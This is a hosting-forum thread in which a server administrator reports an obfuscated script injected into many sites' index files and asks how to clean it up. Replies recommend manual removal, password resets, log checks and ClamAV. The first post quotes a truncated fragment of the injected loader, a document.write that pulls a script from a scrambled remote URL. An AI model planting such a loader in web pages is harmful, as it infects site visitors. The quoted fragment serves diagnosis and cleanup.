1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Infected index.xxx files on my server

Discussion in 'Security' started by samuelmf, Jan 25, 2010.

  1. samuelmf

    samuelmf Member

    Joined:
    May 22, 2006
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Perú
    Hi i have many sites of my server with Redhat ES 3 and cPanel 11.24.5-S38506 - WHM 11.24.2 - X 3.9

    Many sites, have a code like:
    <script>/*Exception*/ document.write('<script src='+'h@$(@t!t^p!&:#^@/^!)^/!p^l#!@a@&$$) ...... \$/ig, '')+' defer=defer></scr'+'ipt>');</script><!--9f5661a0f751133b5d2ccace4a586aaa-->

    It's similar to the gumblar, but this dont create an iframe.

    How could i secure my sites and remove this trojan without remove my site and my databases and other things.

    Thanks in advance!
     
    #1 samuelmf, Jan 25, 2010
    Last edited: Jan 25, 2010
  2. thewebhosting

    thewebhosting Active Member

    Joined:
    May 9, 2008
    Messages:
    1,202
    Likes Received:
    1
    Trophy Points:
    38
    You will have to manually remove the malicious script from all your files and reset the password of all your accounts including cpanel, FTP etc. Before doing that check the FTP logs from which IP address the malicious script was uploaded or the file being modified and block the particular IP address in your server.
     
  3. samuelmf

    samuelmf Member

    Joined:
    May 22, 2006
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Perú
    Could i install on my server the Anti-Gumblar script?
     
  4. emindstech

    emindstech New Member

    Joined:
    Jan 22, 2010
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    Anti Gumblar wont help

    Hello,

    Installation of Anti Gumblar wont help that much.

    We would suggest you to download your all pages, related to site content to local machine scan it and and re upload it again. Make sure to change FTP password complex and confidential. And then re upload your all site related content. It would be more helpful to you.

    You can get help from developer to remove the script that infected to main page or respective page.

    Regards,
    Eminds Tech - Kapil
     
  5. samuelmf

    samuelmf Member

    Joined:
    May 22, 2006
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Perú
    Some specific antivirus software to remove the virus locally?
     
  6. cPanelDon

    cPanelDon cPanel Quality Assurance Analyst
    Staff Member

    Joined:
    Nov 5, 2008
    Messages:
    2,558
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Houston, Texas, U.S.A.
    For server-side usage I recommend ClamAV; it is free and readily available. For a Linux RPM-based OS like CentOS or RHEL I recommend to first ensure that there are no conflicting ClamAV software packages (RPMs) installed, and then proceed to compile ClamAV from source by installing the ClamAV Connector plug-in via WHM:
    WHM: Main >> cPanel >> Manage Plugins >> clamavconnector

    To check for conflicting ClamAV software packages the following command may be used:
    Code:
    # rpm -qa | grep -i clam
    To remove a conflicting RPM, simply use "rpm -e" followed by the package name.

    Once ClamAV is installed I recommend reviewing usage information in the provided manual "man" documentation using the following command via root SSH access:
    Code:
    # man clamscan
    For home or other non-server use (e.g., if scanning files on a local workstation) I personally prefer Kaspersky Anti-Virus; it is a commercially-licensed (paid) product, but there is a free trial period where the software could be tested to see if it meets your specific needs or requirements.

    Reference web site and vendor forums: Kaspersky Lab & Kaspersky Lab Forum
     

Share This Page